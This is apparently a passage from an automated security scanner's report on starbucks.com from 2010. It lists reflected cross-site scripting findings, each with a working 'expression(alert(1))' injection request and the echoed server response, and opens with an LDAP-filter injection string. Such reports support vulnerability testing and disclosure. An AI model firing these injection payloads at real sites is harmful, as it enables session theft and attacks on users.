Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK
Content-Length: 54

cboSubjects=1000&cboSubTopics=100&EMail.x=*)!(sn=*&EMail.y=7

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Location: /guestassist/shcontus.asp?error=noselection
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=EODAELCBBDPKJGHJDMNGKJDP; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:24:52 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>

3. Cross-site scripting (reflected)
There are 108 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=169adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:17 GMT
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" />
...[SNIP]...

3.2. http://www.starbucks.com/ [8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8974f%20style%3dx%3aexpression(alert(1))%20727be240e75 was submitted in the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter. This input was echoed as 8974f style=x:expression(alert(1)) 727be240e75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e=18974f%20style%3dx%3aexpression(alert(1))%20727be240e75 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; _chartbeat2=qspoj3z1snwoz3gj

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=eycnoc45avhu3vzohhihd4zf; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:42:45 GMT
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=18974f style=x:expression(alert(1)) 727be240e75" />
...[SNIP]...

3.3. http://www.starbucks.com/ [8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9d18d%20style%3dx%3aexpression(alert(1))%2099773d5c1aa was submitted in the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter. This input was echoed as 9d18d style=x:expression(alert(1)) 99773d5c1aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e=19d18d%20style%3dx%3aexpression(alert(1))%2099773d5c1aa HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=0luwrc55zxysed45zp5au455; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:43:04 GMT
Content-Length: 41392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=19d18d style=x:expression(alert(1)) 99773d5c1aa" />
...[SNIP]...

3.4. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=ntjkwoi4dh2ibi45qfgoseio; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:15:04 GMT
Content-Length: 41208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" />
...[SNIP]...

3.5. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949e3"style%3d"x%3aexpression(alert(1))"f35557201b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949e3"style="x:expression(alert(1))"f35557201b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us?949e3"style%3d"x%3aexpression(alert(1))"f35557201b0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:20:47 GMT
Connection: close
Content-Length: 38360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us?949e3"style="x:expression(alert(1))"f35557201b0=1"/>
...[SNIP]...

3.6. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:25 GMT
Content-Length: 56826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/>
...[SNIP]...

3.7. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:00:23 GMT
Connection: close
Content-Length: 37678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/>
...[SNIP]...

3.8. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:15 GMT
Connection: close
Content-Length: 39114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/>
...[SNIP]...

3.9. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:03:56 GMT
Connection: close
Content-Length: 43928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/>
...[SNIP]...

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:39 GMT
Connection: close
Content-Length: 52482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/>
...[SNIP]...

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:26 GMT
Connection: close
Content-Length: 42434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/>
...[SNIP]...

3.12. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:59 GMT
Connection: close
Content-Length: 42477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/>
...[SNIP]...

3.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
